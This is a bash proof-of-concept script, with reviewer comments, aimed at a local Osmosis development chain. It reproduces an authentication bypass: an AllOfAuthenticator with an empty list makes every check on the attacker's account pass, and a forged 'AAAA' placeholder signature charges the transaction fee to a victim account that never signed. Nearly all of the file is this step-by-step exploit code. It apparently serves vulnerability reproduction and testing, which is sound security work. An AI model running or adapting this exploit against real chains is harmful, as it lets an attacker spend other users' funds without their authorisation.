#!/bin/bash
# Reproduction harness configuration. Everything here targets the local
# "localosmosis" chain id and the "test" keyring backend (keys are not
# passphrase-protected), so it is only meaningful against a developer node.
BINARY="osmosisd"
# NOTE(review): a tilde inside double quotes is not expanded by the shell, and
# it is not expanded later when $CHAIN_HOME is substituted either, so the
# binary receives the literal string "~/.osmosisd-local". Confirm the binary
# resolves that as intended; "$HOME/.osmosisd-local" is the unambiguous form.
CHAIN_HOME="~/.osmosisd-local"
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"

# Print the bech32 address of a key stored in the local test keyring.
# Arguments: key name(s), passed through unchanged.
key_addr() {
  $BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a "$@"
}

# hacker_auth: the account whose authenticator set is manipulated below.
# victim:      the account later named as fee payer without ever signing.
HACKER_ADDR=$(key_addr hacker_auth)
VICTIM_ADDR=$(key_addr victim)
# One-time preparation, executed only when the first argument is "setup".
# Goal (per the original author): leave the hacker_auth account with an
# AllOfAuthenticator that has no sub-authenticators, so that every check on
# that account passes. An "all of" over an empty list is vacuously satisfied.
# NOTE(review): a chain-side guard would presumably reject an empty
# sub-authenticator list when the authenticator is registered - confirm
# against the authenticator module.
if [[ "$1" == "setup" ]]; then
  # Step 1: register a signature authenticator for the given secp256k1 key.
  $BINARY $TX_FLAGS tx authenticator add-authenticator \
    SignatureVerificationAuthenticator "Ao3uARK8EwlXQ6r0X6z+xjmDSZ2WV2fn0Q1F5E3ZBJy+" \
    --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes

  # Step 2: register the composite authenticator with an empty ("[]") list.
  $BINARY $TX_FLAGS tx authenticator add-authenticator \
    AllOfAuthenticator "[]" \
    --from $HACKER_ADDR --fees 875uosmo --broadcast-mode block --yes

  # Step 3: remove authenticator id 0.
  # NOTE(review): presumably id 0 is the signature authenticator from step 1,
  # which would leave only the empty AllOfAuthenticator - confirm how ids are
  # assigned on the target chain.
  cat > msgs.json << EOF
{"body":{"messages":[{
"@type":"/osmosis.authenticator.MsgRemoveAuthenticator",
"sender":"$HACKER_ADDR","id":0}],
"memo":"","timeout_height":"0","extension_options":[],
"non_critical_extension_options":[]},"auth_info":{"signer_infos":[],
"fee":{"amount":[{"denom":"uosmo","amount":"875"}],
"gas_limit":"350000","payer":"","granter":""}},"signatures":[]}
EOF

  # stderr is merged into the stream that jq parses, so any warning printed
  # by the signer ends up in (and can break) signed.json.
  $BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR 2>&1 \
    | jq > signed.json
  $BINARY $TX_FLAGS tx broadcast signed.json --output json --broadcast-mode block
fi
# Unsigned transaction under test. Two fields matter for the review:
#   - the only message is a MsgWithdrawDelegationRewards for the hacker_auth
#     account, so that account is the only party that legitimately signs;
#   - auth_info.fee.payer names the victim account, which means the 1000000
#     uosmo fee would be charged to an account that has not authorised it.
# A correct ante handler must require a valid signature from the fee payer.
cat > msgs.json << EOF
{
"body": {
"messages": [
{
"@type": "/osmosis.valsetpref.v1beta1.MsgWithdrawDelegationRewards",
"delegator":"$HACKER_ADDR"
}
],
"memo": "",
"timeout_height": "0",
"extension_options": [],
"non_critical_extension_options":[]
},
"auth_info": {
"signer_infos": [],
"fee": {
"amount": [
{
"denom": "uosmo",
"amount": "1000000"
}
],
"gas_limit": "25000000",
"payer": "$VICTIM_ADDR",
"granter": ""
}
},
"signatures": []
}
EOF

# Sign with the hacker_auth key only (amino-json sign mode). stderr is merged
# into the stream that jq parses, so signer warnings can corrupt signed.json.
$BINARY $TX_FLAGS tx sign msgs.json --from=$HACKER_ADDR --sign-mode amino-json 2>&1 \
  | jq > signed.json

# Fill slot 1 of signer_infos and signatures with placeholder data: the public
# key and the signature are both the constant "AAAA", not material derived
# from the victim's key. Any node that actually verifies the fee payer's
# signature has to reject the resulting signed2.json; acceptance indicates the
# verification step was skipped or short-circuited for this transaction.
jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
"sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' < signed.json \
  | jq '.signatures[1] |= .+ "AAAA"' > signed2.json
# Query the uosmo balance of the given address on the local node.
# Arguments: address, passed through unchanged.
# Outputs:   the raw query result on stdout.
uosmo_balance() {
  $BINARY --home=$CHAIN_HOME query bank balances "$@" --denom uosmo
}

# Snapshot both balances before the broadcast so the fee deduction, if any,
# can be attributed to a specific account afterwards.
VICTIM_BALANCE=$(uosmo_balance $VICTIM_ADDR)
HACKER_BALANCE=$(uosmo_balance $HACKER_ADDR)
printf '%s\n' "Balances before:"
printf '%s\n' "hacker ($HACKER_ADDR): $HACKER_BALANCE"
printf '%s\n' "victim ($VICTIM_ADDR): $VICTIM_BALANCE"

# Broadcast the transaction carrying the placeholder signer entry and keep the
# full response for inspection.
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > output.json

# Event attribute keys and values are base64-decoded for readability, then
# only the event at index 2 is printed.
# NOTE(review): index 2 is presumably the fee-related event - confirm against
# the node's actual event ordering.
jq '.events[].attributes[] |= {key: (.key | @base64d),value: (.value | @base64d),index: .index}' < output.json \
  | jq '.events[2]'

# Re-read the balances. Expected result on a node that verifies the fee
# payer's signature: the broadcast is rejected and the victim balance is
# unchanged. A drop in the victim balance means the fee was charged to an
# account that never signed.
VICTIM_BALANCE=$(uosmo_balance $VICTIM_ADDR)
HACKER_BALANCE=$(uosmo_balance $HACKER_ADDR)
printf '%s\n' "Balances after:"
printf '%s\n' "hacker: $HACKER_BALANCE"
printf '%s\n' "victim: $VICTIM_BALANCE"